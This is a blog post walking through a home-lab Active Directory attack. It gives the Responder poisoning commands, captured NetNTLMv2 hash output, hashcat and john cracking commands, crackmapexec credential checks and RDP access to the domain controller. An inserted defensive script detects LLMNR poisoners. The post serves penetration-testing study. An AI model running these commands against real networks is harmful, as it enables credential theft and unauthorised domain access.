
Sunday, September 12, 2021

Active Directory CORPORATIVE.domain.local Series [II]: Responder attack

  Hi everyone,


So far so good. I hope that you've read my last post on the roadtoOSCP blog, Active Directory series [I]; in that post I described the environment architecture that we are going to use during this series of attacks on our local corporate domain.


In this post we are going to execute the Responder attack and an offline brute-force cracking attack in order to abuse the NetNTLMv2 hash type that Windows hosts joined to an Active Directory domain use for authentication and authorization when a logged-in user accesses shared folders on other hosts of the network. This is something common in corporate environments.

The first point of the day is to present the architecture of the domain controller interaction and the minimal configuration we need in order to carry out this kind of attack successfully.

Current design:



Minimal configuration required:

    - Windows Server 2016 [Domain Controller]
    - Windows 10 [WKS-001]
    - Windows 10 [WKS-002]
    - Kali Linux [Attacker machine]

From the server side, I present evidence of the Windows 10 computers that belong to the domain CORPORATIVE.DOMAIN.local:



We must also create a couple of worker users that belong to this domain; we are going to use them to log in to the computers with their domain accounts:


Network reconnaissance using the ARP protocol:




Responder Attack Process:

Using the default configuration for the Responder attack:


We can run the Responder tool with the python3 interpreter on interface eth0 with the parameters -rdw:

  -r, --wredir          Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
                        network. Default: False
  -d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
                        False



And we are ready to start the poisoned-response network attack. When any user logged on to the domain tries to access a shared directory that does not exist or is unavailable at that moment, we are ready to answer the request and obtain the NTLMv2 hash that the system uses for the authenticated user:

1. In this case we are going to make a PoC with the share folder \\IGS:

with user: worker2

from machine: WKS-002


Nice, we got it:

[*] [MDNS] Poisoned answer sent to 10.0.2.16       for name IGS.local
[*] [LLMNR]  Poisoned answer sent to 10.0.2.16 for name IGS ##Resource
[SMB] NTLMv2-SSP Client   : 10.0.2.16 ##Machine
[SMB] NTLMv2-SSP Username : CORPORATIVE\worker2 ##Domain and user of AD
[SMB] NTLMv2-SSP Hash     : worker2::CORPORATIVE:1d9184c9b45b5c3e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
[*] [MDNS] Poisoned answer sent to 10.0.2.16       for name IGS.local
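The poisoned LLMNR answers above are also what a defender can fish for: a host that asks the segment for a name which cannot exist should get silence, so anyone who answers is a poisoner. The following script is an added example (not part of this post and not part of Responder) that builds an LLMNR query for a canary name, multicasts it, and reports every host that answers. The canary name, the address 10.0.2.99 and the constructed reply used for offline testing are assumptions; the packet builder and parser run offline, while probe() needs a live segment.

```python
"""LLMNR canary probe: ask the segment for a name that cannot exist and report
whoever answers. Added example, not part of the post or of Responder."""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"        # IPv4 link-local multicast group used by LLMNR
LLMNR_PORT = 5355
CANARY_NAME = "wks-canary-9f3a"    # assumption: any name that no real host or DNS zone has


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels ended by a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.strip(".").split("."))
    return out + b"\x00"


def build_query(name: str, txid: int) -> bytes:
    """LLMNR query: header (ID, flags=0, QDCOUNT=1) plus one A/IN question."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)


def skip_name(data: bytes, off: int) -> int:
    """Return the offset just past a wire-format name, compressed pointers included."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:          # 2-byte compression pointer ends the name
            return off + 2
        off += 1 + length


def parse_answers(data: bytes, txid: int) -> list:
    """IPv4 addresses in the A records of a reply that matches our transaction id."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if rid != txid or not (flags & 0x8000):   # wrong id, or not a response (QR bit clear)
        return []
    off = 12
    for _ in range(qd):                        # skip the echoed question section
        off = skip_name(data, off) + 4
    addrs = []
    for _ in range(an):
        off = skip_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return addrs


def make_reply(txid: int, name: str, ip: str, compress: bool = False) -> bytes:
    """Constructed reply shaped like a poisoner's LLMNR answer (question echoed, one A record)."""
    owner = b"\xc0\x0c" if compress else encode_name(name)   # 0x0c: offset of the question name
    return (struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)
            + encode_name(name) + struct.pack(">HH", 1, 1)
            + owner + struct.pack(">HHIH", 1, 1, 30, 4) + socket.inet_aton(ip))


def probe(name: str = CANARY_NAME, timeout: float = 2.0) -> list:
    """Multicast one query for the canary name; return (sender, answered_ip) for every answer."""
    txid = random.randint(0, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:                            # collect until the timeout: silence is the good case
            data, (src, _port) = sock.recvfrom(1024)
            hits.extend((src, ip) for ip in parse_answers(data, txid))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    found = probe()
    for src, ip in found:
        print(f"ALERT: {src} answered LLMNR for {CANARY_NAME} with {ip} (possible poisoner)")
    if not found:
        print(f"no answer for {CANARY_NAME}: no LLMNR poisoner responding on this segment")
```

Run it from a workstation on the same segment as the clients; an answer for the canary name is a high-confidence signal because no legitimate resolver holds that name. The parser checks the transaction id and the QR bit so that stray traffic on port 5355 is not reported.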


Now we are ready to perform an offline dictionary attack in order to recover the plaintext password from the NTLMv2 hash and log in to the domain with the (user, password) tuple.

Using, for example, the following tools:

kali@kali:~$ echo "worker2::CORPORATIVE:1d9184c9b45b5c3e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" > hashNtlmv2_worker2

1. John the Ripper with a dictionary attack using /usr/share/wordlists/rockyou.txt:

kali@kali:~$ sudo john --format=netntlmv2 hashNtlmv2_worker2 --wordlist=/usr/share/wordlists/rockyou.txt

2. hashcat with hash mode 5600 (NetNTLMv2) and a dictionary attack using /usr/share/wordlists/rockyou.txt:

kali@kali:~$ sudo hashcat -m 5600 hashNtlmv2_worker2 /usr/share/wordlists/rockyou.txt 

[sudo] password for kali: 

hashcat (v6.1.1) starting...

Results:




kali@kali:~$ sudo hashcat -m 5600 hashNtlmv2_worker2 /usr/share/wordlists/rockyou.txt --show

[sudo] password for kali: 

WORKER2::CORPORATIVE:1d9184c9b45b5c3e:51a9bc8ab2022db4266c71062eb8a9ef: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:Passw0rd1



Fingerprinting SMB services:

kali@kali:/usr/share/responder/tools$ python3 RunFinger.py -i 10.0.2.0/24

Retrieving information for 10.0.2.17...
SMB signing: False
Null Sessions Allowed: True
Server Time: 2021-09-12 15:35:21
OS version: 'Windows Server 2016 Standard Evaluation 14393'
Lanman Client: 'Windows Server 2016 Standard Evaluation 6.3'
Machine Hostname: 'CORPORATIVE-DOM'
This machine is part of the 'CORPORATIVE' domain
RDP port open: 'True'


Validate credentials:

We can verify with the crackmapexec tool that the SMB service is enabled and active:

crackmapexec smb 10.0.2.0/24

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)

 

And finally, right now we can validate the credentials using the following command:

crackmapexec smb 10.0.2.17 -u "worker2" -p "Passw0rd1" -d "CORPORATIVE.DONAIN"

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DONAIN) (signing:True) (SMBv1:True)

SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DONAIN\worker2:Passw0rd1 


Access to the Domain Controller:


Using the previous information (RDP port open == True on the Windows Server 2016 target machine) and the credentials of the domain user worker2:



And this is all for the first Active Directory attack. I hope that you enjoy my second Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

With kind regards, f0ns1
